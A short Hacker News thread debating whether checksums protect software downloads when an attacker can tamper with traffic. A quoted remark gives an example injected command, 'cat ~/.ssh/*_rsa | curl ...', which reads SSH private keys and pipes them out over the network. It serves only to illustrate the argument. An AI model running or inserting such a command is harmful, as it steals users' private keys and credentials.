Hacker News new | ask | show | jobs
by moondev 1401 days ago
> Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..."

If you can inject that breaking TLS which secures everything on the internet, why can't you inject your own checksum on the "download page"?
1 comments
zbird 1401 days ago
Checksums and the binaries can be stored in different places for redundancy.
link